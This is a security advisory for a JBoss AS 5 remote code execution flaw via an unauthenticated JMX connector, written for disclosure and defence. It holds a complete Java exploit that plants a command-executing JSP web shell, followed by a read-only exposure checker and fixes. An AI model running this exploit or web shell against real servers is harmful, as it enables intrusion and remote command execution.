CVE-2014-3518 JBoss EAP/AS 5: Remote code execution

Overview

JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of the Java 2 Enterprise Edition (J2EE) specification and is used to host Java EE applications and other web applications.

JBoss AS is released under the GNU Lesser General Public License (LGPL). The JBoss.org community provides free support for the application server.

We have found that default installations of JBoss AS 5.x are prone to remote code execution.

Story and description

While investigating the JBoss security of one of our customers, we found that even after Red Hat's recommended mitigation at https://access.redhat.com/site/solutions/30744 has been applied, the DeploymentFileRepository service that the JMX console exposes can still be invoked through the JMX remoting connector over JNDI/RMI. The connector is registered in the RMI registry (port 1090 by default) and accepts connections without credentials.

We were also aware of a worm that exploits CVE-2010-0738; had attackers known about this path as well, they would have caused far more trouble in JBoss 4.x and 5.x installations.

We reported this issue to Red Hat on 23 June 2014, and they published their report on the related Red Hat Customer Portal page in July 2014.

Exploit

To test your own servers, you can use the sample code below. It connects to the JMX remoting connector without credentials and calls DeploymentFileRepository.store(), which creates jspshell.jsp inside an exploded shell.war on the target; the JSP then executes any command passed in the sh request parameter.

import javax.management.*;
import javax.management.remote.*;
public class Cve20143518Poc {
    public static void main(String[] args) throws Exception {
        // JMX remoting connector looked up via the RMI registry; 1090 is the JBoss AS 5 default port
        String urlStr = "service:jmx:rmi://TARGET_HOST/jndi/rmi://TARGET_HOST:1090/jmxconnector";
        JMXServiceURL url = new JMXServiceURL(urlStr);
        // null environment = no credentials; a vulnerable installation accepts the connection anyway
        JMXConnector conn = JMXConnectorFactory.connect(url, null);
        MBeanServerConnection server = conn.getMBeanServerConnection();
        String shellFileName = "jspshell";
        String shellFileExtension = ".jsp";
        String warFileName = "shell";
        String warFileExtension = ".war";
        // Minimal JSP shell: executes the "sh" request parameter and echoes the process output
        String jspShell = "<%@ page import=\"java.util.*,java.io.*\"%><%if (request.getParameter(\"sh\") != null) {out.println(\"Command: \" +request.getParameter(\"sh\") + \"\");Process p =Runtime.getRuntime().exec(request.getParameter(\"sh\"));OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ) {out.println(disr);disr = dis.readLine();}}%>";
        // store(folder, name, fileExt, data, noHotDeploy) writes shell.war/jspshell.jsp under the deploy
        // directory; JBoss deploys the exploded war and serves it at /shell/jspshell.jsp?sh=<command>
        server.invoke(new ObjectName("jboss.admin:service=DeploymentFileRepository"), "store",
                new Object[]{warFileName + warFileExtension, shellFileName, shellFileExtension, jspShell, true},
                new String[]{"java.lang.String", "java.lang.String", "java.lang.String", "java.lang.String", "boolean"});
        conn.close();
    }
}
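
A non-destructive way to check exposure is to perform only the first half of the attack: connect to the JMX remoting connector without credentials and inspect MBean metadata, without ever invoking store(). The following checker is an added example written for this page; it is not part of the original advisory or of JBoss. It assumes the same connector URL layout as the exploit above (jmxconnector registered in the RMI registry, port 1090 by default) and that a connector configured to require authentication rejects the credential-less connect() with a SecurityException; the class and output strings are our own.

```java
import javax.management.MBeanInfo;
import javax.management.MBeanOperationInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

/**
 * Read-only exposure check for CVE-2014-3518 (added example, not from the advisory).
 * Usage: java JmxRemotingCheck <host> [rmiPort]   (rmiPort defaults to 1090, the JBoss AS 5 default)
 * It never calls store(); it only connects without credentials and reads MBean metadata.
 */
public class JmxRemotingCheck {
    static final String TARGET_MBEAN = "jboss.admin:service=DeploymentFileRepository";

    public static void main(String[] args) throws Exception {
        String host = args[0];
        int port = args.length > 1 ? Integer.parseInt(args[1]) : 1090;
        String urlStr = "service:jmx:rmi://" + host + "/jndi/rmi://" + host + ":" + port + "/jmxconnector";

        JMXConnector conn;
        try {
            // null environment: deliberately send no credentials, exactly as the exploit does
            conn = JMXConnectorFactory.connect(new JMXServiceURL(urlStr), null);
        } catch (SecurityException e) {
            // assumption: a connector with an authenticator rejects the anonymous connect this way
            System.out.println("NOT EXPOSED: connector requires authentication (" + e.getMessage() + ")");
            return;
        } catch (java.io.IOException e) {
            System.out.println("NO CONNECTOR: could not reach " + urlStr + " (" + e.getMessage() + ")");
            return;
        }

        try {
            MBeanServerConnection server = conn.getMBeanServerConnection();
            ObjectName name = new ObjectName(TARGET_MBEAN);
            if (!server.isRegistered(name)) {
                System.out.println("CONNECTOR OPEN: anonymous access works, but " + TARGET_MBEAN + " is not registered");
                return;
            }
            // Confirm the dangerous operation is actually reachable: store(folder, name, fileExt, data, noHotDeploy)
            MBeanInfo info = server.getMBeanInfo(name);
            boolean storeExposed = false;
            for (MBeanOperationInfo op : info.getOperations()) {
                if ("store".equals(op.getName()) && op.getSignature().length == 5) {
                    storeExposed = true;
                }
            }
            System.out.println(storeExposed
                    ? "VULNERABLE: unauthenticated JMX connector exposes " + TARGET_MBEAN + ".store()"
                    : "CONNECTOR OPEN: " + TARGET_MBEAN + " is registered but no 5-argument store() was found");
        } finally {
            conn.close();
        }
    }
}
```

Run it before and after applying the fix: a patched or hardened installation should print NOT EXPOSED (authentication enforced) or NO CONNECTOR (port 1090 firewalled or the connector removed), while VULNERABLE means the exploit above would succeed as written.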

Affected versions

Releases prior to Red Hat JBoss Enterprise Application Platform (JEAP) 5.2.0, Red Hat JBoss BRMS 5.3.1, Red Hat JBoss Portal Platform 5.2.2 and Red Hat JBoss SOA Platform 5.3.1.

Fixes

See Red Hat's knowledge base article at https://access.redhat.com/solutions/1120423 for the patched versions. Until the patch is applied, make sure the RMI registry and JMX remoting connector (port 1090 by default) are not reachable from untrusted networks, and verify that the connector rejects a connection made without credentials.